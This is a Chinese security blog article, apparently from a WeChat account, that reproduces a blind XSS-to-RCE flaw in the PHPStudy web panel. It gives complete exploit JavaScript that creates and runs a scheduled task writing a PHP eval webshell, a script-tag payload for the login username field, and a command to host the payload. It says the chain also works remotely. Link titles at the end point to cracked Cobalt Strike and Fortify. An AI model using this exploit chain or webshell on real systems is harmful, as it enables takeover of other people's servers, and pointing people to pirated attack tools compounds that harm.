PHPStudy概述
PhpStudy国内12年老牌公益软件,集安全、高效、功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP、LNMP、集群、监控、网站、数据库、FTP、软件中心、伪静态、云备份、SSL、多版本共存、Nginx反向代理、服务器防火墙、web防火墙、监控大屏等100多项服务器管理功能。PhpStudy面板存在XSS盲打漏洞,攻击者可以JS调用面板中的计划任务执行系统命令。
下载链接:
https://www.xp.cn/windows-panel.html
漏洞复现
下载安装
安装完成后弹出初始信息txt:
漏洞复现:
本地复现:
1、新建一个文件比如poc.js下入下面的代码:
代码目的为使用小皮面板的计划任务写入网站根目录win.php(需根据实际路径写入webshell)
(代码24行根据自己PHPStudy路径进行修改,还可修改文件名、时间、标题等)
function poc(){$.get('/service/app/tasks.php?type=task_list',{},function(data){var id=data.data[0].ID;$.post('/service/app/tasks.php?type=exec_task',{tid:id},function(res2){$.post('/service/app/log.php?type=clearlog',{},function(res3){},"json");},"json");},"json");}function save(){var data=new Object();data.task_id="";data.title="w";data.exec_cycle="1";data.week="1";data.day="3";data.hour="14";data.minute = "20";data.shell='echo "<?php @eval($_POST[123]);?>" > D:/xp.cn/www/wwwroot/admin/localhost_80/wwwroot/1.php';$.post('/service/app/tasks.php?type=save_shell',data,function(res){poc();},'json');}save();
2、在poc.js目录启动web端口:
python -m http.server 100
用户名处输入下面payload,密码任意。
<script src=http://127.0.0.1:100/poc.js></script>
3、重新使用使用正确的帐号密码进行登录:
进入首页或者操作日志,将执行计划任务写入webshell。
注意“安装杀软比如360,可能会阻止写入php文件”
远程复现:
和本地操作类似,只需要输入公网地址登录,本地回连地址改成自己的地址即可,不再展示。
免责声明:由于传播、利用本公众号WIN哥学安全提供的文章、工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号WIN哥学安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,本号会立即删除并致歉。谢谢!
Fortify 22.2-Windows&Linux&Mac 破解版
漏扫工具Invicti-Professional(原Netsparker)
cobalt strike 4.7 破解版 cracked(附下载)
VMware vCenter漏洞综合利用Tools(附下载)
Android漏洞挖掘三板斧--drozer+Inspeckage(xosed)+MobSF
【漏洞复现 | 附EXP】CVE-2022-40684 & CVE-2022-22954
原文始发于微信公众号(WIN哥学安全):【漏洞复现】PHPStudy Web面板RCE漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论